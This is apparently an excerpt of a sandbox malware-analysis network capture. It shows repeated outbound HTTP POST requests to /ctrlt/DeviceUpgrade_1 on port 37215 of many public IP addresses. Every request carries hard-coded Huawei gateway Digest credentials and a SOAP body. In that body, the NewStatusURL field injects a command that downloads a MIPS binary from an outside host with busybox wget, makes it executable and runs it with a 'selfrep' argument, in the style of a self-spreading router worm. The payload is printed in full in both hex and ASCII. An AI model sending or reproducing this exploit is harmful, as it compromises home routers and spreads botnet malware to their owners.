69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  355192.168.2.1353770157.41.38.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100475073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  356192.168.2.1344130197.51.130.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100475073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  357192.168.2.133465241.130.181.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100502014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  358192.168.2.1354080157.103.137.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100508928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  359192.168.2.134900865.5.157.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100541115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  360192.168.2.1353818197.183.62.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100541115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  361192.168.2.1358128197.121.3.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100547075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  362192.168.2.1360846197.144.196.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100555897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  363192.168.2.1357854157.12.20.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100581884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  364192.168.2.1341954157.59.230.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100593090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  365192.168.2.1351394143.34.42.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100594044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
